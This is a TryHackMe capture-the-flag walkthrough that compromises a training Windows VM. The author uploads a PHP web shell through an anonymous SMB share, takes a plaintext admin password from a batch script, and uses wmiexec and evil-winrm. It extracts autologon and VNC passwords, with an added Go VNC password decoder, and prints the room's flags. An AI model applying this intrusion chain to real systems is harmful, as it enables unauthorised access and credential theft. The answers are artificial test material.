
AllSignsPoint2Pwnage TryHackMe Walkthrough

6 min read, Aug 24, 2025

TL;DR Walkthrough of the TryHackMe room AllSignsPoint2Pwnage.

THM Walkthroughs:

A full list of our TryHackMe walkthroughs and cheatsheets is here.

Background

The room has questions which I assume were meant to guide us; however, I ran off the track the questions were on about halfway through Task 2 of 4. This was around the time I gained initial access, after which I was busy poking around the VM until I stumbled on Administrator access. I ended up using wmiexec as Administrator to enable WinRM, then used evil-winrm to go back and find the answers to the questions.

I’ll show how I navigated through the VM from enumeration to initial access to privilege escalation and then do the room’s Q&A at the end.

On an admin note, the astute reader will notice that the IPs change throughout this walkthrough. This is because TryHackMe has been very janky lately and I had to reset the VM a few times to complete the room. I didn't use any reverse shells in this room; all IPs shown are the target VM on TryHackMe.

Enumeration

As always, I started with an nmap scan.

sudo nmap -sS -sV -Pn 10.201.26.227

TryHackMe has been having a lot of issues lately. I had to reset the VM two or three times before I found all the ports. It kept timing out and only showing 135, 139, and 445.

It looks like the system has FTP and file shares open. I tried enumerating them with the guest account and no password; however, this didn't work beyond enum4linux. I next tried anonymous and found that it worked for FTP and SMB access.

I found the share drives with enum4linux first.

enum4linux -u guest -a 10.201.123.124

I next tried FTP.

ftp 10.201.97.138

However, there wasn't anything there that we didn't already know.

I swung by the website that’s running on port 80 thinking there might be a username list, but all I saw was some pictures.

I next tried anonymous access to the Images share.

smbclient //10.201.97.138/images$ -U anonymous

Interesting: this share looks like the same folder hosting the pictures on the website. Let's try uploading something to it.

put p0wny.php

It uploaded the web shell, but I had no idea where it went URL-wise. Hence I ran gobuster to check for the obvious directories on the website.

gobuster dir -u http://10.201.97.138 -w /home/kali/Downloads/SecLists-master/Discovery/Web-Content/big.txt

There’s a directory named ‘images’. Go figure.

Initial Access

I navigated to

http://10.201.97.138/images/p0wny.php

Lo and behold we have web shell access as user ‘sign’.

I poked around the file system randomly for a few minutes, then thought to myself, "Wait a minute, there was another share called 'Installs$' that didn't allow anonymous access. I wonder if I can access it with sign's NTFS rights?"

Privilege Escalation

It turns out I could access it, and the key to privilege escalation was just lying there.

cd C:\
dir
cd C:\Installs
dir
type Install_www_and_deploy.bat
@echo off
REM Shop Sign Install Script
cd C:\Installs
psexec -accepteula -nobanner -u administrator -p RCYCc3GIjM0v98HDVJ1KOuUm4xsWUxqZabeofbbpAss9KCKpYfs2rCi xampp-windows-x64-7.4.11-0-VC15-installer.exe --disable-components xampp_mysql,xampp_filezilla,xampp_mercury,xampp_tomcat,xampp_perl,xampp_phpmyadmin,xampp_webalizer,xampp_sendmail --mode unattended --launchapps 1
xcopy C:\Installs\simepleslide\src\* C:\xampp\htdocs\
move C:\xampp\htdocs\index.php C:\xampp\htdocs\index.php_orig
copy C:\Installs\simepleslide\src\slide.html C:\xampp\htdocs\index.html
mkdir C:\xampp\htdocs\images
UltraVNC_1_2_40_X64_Setup.exe /silent
copy ultravnc.ini "C:\Program Files\uvnc bvba\UltraVNC\ultravnc.ini" /y
copy startup.bat "c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\"
pause

Look at that: we have a potential Administrator password in plaintext. That was quick.

/usr/share/doc/python3-impacket/examples/wmiexec.py Administrator:RCYCc3GIjM0v98HDVJ1KOuUm4xsWUxqZabeofbbpAss9KCKpYfs2rCi@10.201.97.138

winrm quickconfig -force

Q&A

At this point I used WinRM and PowerShell to go back and find the answers to the other questions in the room. The only answers I found while p0wning the VM were the ports open, share names, and the Administrator password.

evil-winrm -i 10.201.94.54 -u Administrator -p RCYCc3GIjM0v98HDVJ1KOuUm4xsWUxqZabeofbbpAss9KCKpYfs2rCi

--- Task 1 ---

Deploy the machine

No answer needed

How many TCP ports under 1024 are open?

sudo nmap -sS -sV -Pn 10.201.26.227

6

What is the hidden share where images should be copied to?

enum4linux -u guest -a 10.201.123.124

Images$

--- Task 2 ---

What user is signed into the console session?

whoami

sign

What is the content of user_flag.txt?

Get-ChildItem -Path "C:\Users" -Filter *.txt -Recurse | Select-String -Pattern "THM" | Select-Object Path, LineNumber, Line

Path                                          LineNumber Line
----                                          ---------- ----
C:\Users\Administrator\Desktop\admin_flag.txt          1 thm{p455w02d_c4n_83_f0und_1n_p141n_73x7_4dm1n_5c21p75}
C:\Users\sign\Desktop\user_flag.txt                    1 thm{48u51n9_5y573m_func710n4117y_f02_fun_4nd_p20f17}

thm{48u51n9_5y573m_func710n4117y_f02_fun_4nd_p20f17}

What hidden, non-standard share is only remotely accessible as an administrative account?

Installs$

--- Task 3 ---

What is the Users Password?

Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" | Select DefaultUserName, DefaultPassword, DefaultDomainName

DefaultUserName DefaultPassword                                        DefaultDomainName
--------------- ---------------                                        -----------------
.\sign          gKY1uxHLuU1zzlI4wwdAcKUw35TPMdv7PAEE5dAFbV2NxpPJVO7eeSH

gKY1uxHLuU1zzlI4wwdAcKUw35TPMdv7PAEE5dAFbV2NxpPJVO7eeSH


What is the Administrators Password?

We found this in a bat file while poking around the VM:

RCYCc3GIjM0v98HDVJ1KOuUm4xsWUxqZabeofbbpAss9KCKpYfs2rCi

What executable is used to run the installer with the Administrator username and password?

cat Install_www_and_deploy.bat

PsExec.exe

What is the VNC Password?

cd C:\Installs
cat ultravnc.ini

[ultravnc]
passwd=B3A8F2D8BEA2F1FA70
passwd2=5AB2CDC0BADCAF13F1

I had to decode the above using Luigi Auriemma’s vncpwd.

.\vncpwd.exe B3A8F2D8BEA2F1FA70

*VNC password decoder 0.2.1
by Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org

- your input password seems in hex format (or longer than 8 chars)

Password: 5upp0rt9

Press RETURN to exit

5upp0rt9

On a side note, I didn't get anything for the second VNC password '5AB2CDC0BADCAF13F1'. Apparently it's the VNC-encoded form of null.
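For readers who want to see what vncpwd is actually doing, here is an added example (my own code, not from the walkthrough and not Luigi Auriemma's tool) that performs the same decode in Go. It goes a little beyond the page: the DES key is derived from the eight constants hard-coded in the original d3des source rather than pasted in as a magic value, NUL padding is stripped so a "not set" password comes back as an empty string instead of silently printing nothing, and the two values are pulled out of a minimal ini body. The function names, the ini parser and the ini wrapper text are my assumptions; the two hex values are the ones quoted above from the room's ultravnc.ini.

```go
package main

import (
	"crypto/des"
	"encoding/hex"
	"fmt"
	"math/bits"
	"strings"
)

// vncKey returns the fixed DES key every VNC implementation uses to
// "encrypt" stored passwords: 23,82,107,6,35,78,88,7 from the original
// d3des code. d3des consumes key bits least-significant-bit first, so a
// standard DES implementation such as Go's crypto/des needs each byte
// bit-reversed, which yields E8 4A D6 60 C4 72 1A E0.
func vncKey() []byte {
	raw := [8]byte{23, 82, 107, 6, 35, 78, 88, 7}
	key := make([]byte, len(raw))
	for i, b := range raw {
		key[i] = bits.Reverse8(b)
	}
	return key
}

// DecodeVNCPassword turns a hex passwd value from ultravnc.ini back into
// plaintext. Only the first 8 bytes are ciphertext; UltraVNC appends one
// extra byte (the trailing "70" / "F1" above) that is not part of the
// password. Passwords shorter than 8 characters are NUL-padded before
// encryption, so the padding is stripped after decryption and an all-NUL
// block decodes to "" (password not set).
func DecodeVNCPassword(hexValue string) (string, error) {
	raw, err := hex.DecodeString(strings.TrimSpace(hexValue))
	if err != nil {
		return "", fmt.Errorf("bad hex: %w", err)
	}
	if len(raw) < des.BlockSize {
		return "", fmt.Errorf("need at least %d bytes, got %d", des.BlockSize, len(raw))
	}
	block, err := des.NewCipher(vncKey())
	if err != nil {
		return "", err
	}
	plain := make([]byte, des.BlockSize)
	block.Decrypt(plain, raw[:des.BlockSize]) // single-block ECB decrypt
	return strings.TrimRight(string(plain), "\x00"), nil
}

// ParseUltraVNCIni extracts passwd and passwd2 from the [ultravnc]
// section. Hypothetical helper written for this example; it only
// understands the key=value lines it needs and ignores other sections.
func ParseUltraVNCIni(content string) map[string]string {
	found := map[string]string{}
	section := ""
	for _, line := range strings.Split(content, "\n") {
		line = strings.TrimSpace(line)
		switch {
		case line == "" || strings.HasPrefix(line, ";"):
			continue
		case strings.HasPrefix(line, "[") && strings.HasSuffix(line, "]"):
			section = strings.ToLower(line[1 : len(line)-1])
		case section == "ultravnc":
			k, v, ok := strings.Cut(line, "=")
			if !ok {
				continue
			}
			k = strings.ToLower(strings.TrimSpace(k))
			if k == "passwd" || k == "passwd2" {
				found[k] = strings.TrimSpace(v)
			}
		}
	}
	return found
}

func main() {
	// Sample input: the two lines quoted from the room's ultravnc.ini,
	// wrapped in a minimal ini body constructed for this example.
	ini := "[ultravnc]\npasswd=B3A8F2D8BEA2F1FA70\npasswd2=5AB2CDC0BADCAF13F1\n"
	values := ParseUltraVNCIni(ini)
	for _, k := range []string{"passwd", "passwd2"} {
		v, ok := values[k]
		if !ok {
			continue
		}
		pw, err := DecodeVNCPassword(v)
		switch {
		case err != nil:
			fmt.Printf("%s: error: %v\n", k, err)
		case pw == "":
			fmt.Printf("%s: (empty / not set)\n", k)
		default:
			fmt.Printf("%s: %s\n", k, pw)
		}
	}
}
```

Run it with `go run` on a copy of the file: passwd decodes to 5upp0rt9, and if passwd2 really is the encrypted empty password, as the walkthrough suggests, it prints as "(empty / not set)" rather than as a blank line. The point worth remembering is that this is not a hash: anyone who can read ultravnc.ini, or the equivalent registry value, gets the password back with a fixed, public key.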

What is the contents of the admin_flag.txt?

Get-ChildItem -Path "C:\Users" -Filter *.txt -Recurse | Select-String -Pattern "THM" | Select-Object Path, LineNumber, Line

Path                                          LineNumber Line
----                                          ---------- ----
C:\Users\Administrator\Desktop\admin_flag.txt          1 thm{p455w02d_c4n_83_f0und_1n_p141n_73x7_4dm1n_5c21p75}
C:\Users\sign\Desktop\user_flag.txt                    1 thm{48u51n9_5y573m_func710n4117y_f02_fun_4nd_p20f17}

thm{p455w02d_c4n_83_f0und_1n_p141n_73x7_4dm1n_5c21p75}

--- Task 4 ---

READ IT

No answer needed

Summary

This was a good little room. I brushed up on FTP, got some good practice with the p0wny web shell, learned a nifty trick about VNC config files, and even checked my notes on querying auto-login passwords stored in the registry. I give the room's author credit for leaving clues, info, and passwords on share drives and in .bat files. Many real environments suffer from this; just ask Varonis. Humans are human after all: we write things down, get forgetful, don't remove setup scripts after they're used, etc. Lord knows I do it too.

Written by Rich

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from auditing or the lab.
